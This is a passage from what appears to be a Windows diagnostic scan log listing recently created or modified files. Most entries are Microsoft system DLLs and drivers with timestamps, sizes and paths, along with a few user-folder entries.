2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
